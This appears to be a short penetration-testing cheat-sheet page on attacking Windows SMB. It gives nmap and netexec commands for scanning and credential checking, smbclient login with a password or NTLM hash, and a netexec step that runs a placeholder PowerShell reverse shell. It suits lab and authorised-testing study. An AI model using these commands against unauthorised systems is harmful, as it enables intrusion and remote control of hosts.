Using SMBClient

# Check if SMB port is open or not.
nmap -p 139,445 $IP

# If Port is open then you can confirm that for the username and credential you are allowed to login or not. If you get "pwned" THEN you are allowed to login.
netexec smb $IP -u $UserName -p '$Password' --continue-on-success

# Normal Login with credential
smbclient \\\\192.168.50.212\\secrets -U Administrator # It will ask for password.

# Using Hash
smbclient \\\\192.168.50.212\\secrets -U $UserName--pw-nt-hash $NTLMHash

# Getting stable shell.
netexec smb $IP -u $UserName -p '$Password' -x '$PowershellBase64ReverseShellCode'
# This will not give shell as "NT System". Use Impacket tool like psexec etc to get NT System shell

PreviousUsing evil-WINRM Tool NextUsing impacket-psexec or impacket-wmiexec

Last updated 10 months ago